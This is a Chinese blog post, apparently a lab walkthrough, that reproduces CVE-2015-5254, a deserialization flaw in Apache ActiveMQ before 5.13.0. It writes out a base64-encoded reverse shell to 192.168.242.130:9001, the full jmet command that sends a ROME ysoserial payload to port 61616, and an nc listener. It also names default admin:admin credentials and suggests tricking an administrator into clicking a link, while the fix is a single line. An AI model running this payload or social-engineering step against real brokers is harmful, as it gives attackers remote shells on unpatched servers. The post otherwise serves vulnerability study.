CVE-2015-5254(ActiveMQ-反序列化漏洞)

漏洞描述

  1. 编号:CVE-2015-5254
  2. 影响版本:Apache ActiveMQ 5.13.0之前5.x版本
  3. CVE地址:CVE-2015-5254
  4. 漏洞原理:该漏洞源于程序没有限制可在代理中序列化的对象。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码

复现

环境

windows,docker,nc:kali(192.168.242.130),java8

步骤

启动环境

docker-compose up -d
docker ps

 监听了61616和8161端口,其中61616是工作端口,消息就在这个端口进行传递;8161是web管理页面的端口,访问127.0.0.1:8186即可访问,不过这个漏洞理论上不需要web的

可以通过管理页面来看版本默认账号密码为admin:adminhttp://127.0.0.1:8161/api/jolokia/,或者使用云悉指纹识别,我这里是本地,云悉是不可以识别本地的

漏洞利用

1、构造可以执行命令的序列化对象

使用jmet进行漏洞利用,下载完在同目录下创建一个external文件夹(否则可能会报错说文件夹不存在)

2、使用Online - Reverse Shell Generator生成一个反弹shell的命令作为一个消息发送给61616端口

 sh -i >& /dev/tcp/192.168.242.130/9001 0>&1进行base64编码c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4yNDIuMTMwLzkwMDEgMD4mMQ==

因此这条消息就是bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4yNDIuMTMwLzkwMDEgMD4mMQ==}|{base64,-d}|{bash,-i}"

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4yNDIuMTMwLzkwMDEgMD4mMQ==}|{base64,-d}|{bash,-i}" -Yp ROME 127.0.0.1 61616

 -Q:列队消息名、-I:选择装载的JMS客户端、-s:选择ysoserial payload、-Y:执行具体命令、-Yp:指定payload类型,后面跟ActiveMQ所在机器的ip以及工作端口

因此这条命令就是使用ROME payload类型把执行的命令进行序列化后作为名为event的消息发送给ActiveMQ

3、访问web管理页面,读取消息,触发漏洞

点击查看这条消息即可触发命令执行

4、kali中使用nc -lvnp 9001即可连接

 修复

实际中可能无法获取管理员权限来触发该消息,因此需要诱导管理员点击某个链接来触发

可以通过打补丁或者升级到新版本即可

  • 10
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

我是你彬哥

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值